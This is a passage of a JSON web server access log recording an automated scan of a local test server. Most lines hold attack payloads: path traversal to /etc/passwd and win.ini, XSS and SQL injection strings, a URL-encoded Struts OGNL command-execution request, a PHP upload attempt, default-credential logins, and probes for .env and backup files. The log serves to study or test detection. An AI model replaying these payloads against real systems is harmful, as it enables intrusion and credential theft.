(Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/settings/values HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-----------------------------5825462663702204104870787337\x0D\x0AContent-Disposition: form-data; name=\x22employee_ID\x22; filename=\x22poc.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------5825462663702204104870787337--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/uploadID.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-file?basedir=4&filepath=..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-snapshot?name=..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{u:\x22admin\x22, t:\x22undefined\x22, p:\x22trilithic\x22, d:\x22\x22, r:false, w:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/v1/AccountService/Accounts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CGI/Java/Serviceability?adapter=device.statistics.configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%2729KD257tbXDIUQ6wP5gybTsfTgP%27%29%3C%2Fscript%3E&pw=nordex&language=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{\x22email\x22:\x2229KD1udImfzyQNFn0YH7J93XDx1@example.com\x22,\x22password\x22:\x2229KD1udImfzyQNFn0YH7J93XDx1\x22,\x22username\x22:\x2229KD1udImfzyQNFn0YH7J93XDx1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/reg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /frontend/web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/login/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gotoURL.asp?url=example.com&id=43569 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /simple/pages/UI.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BitKeeper/etc/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 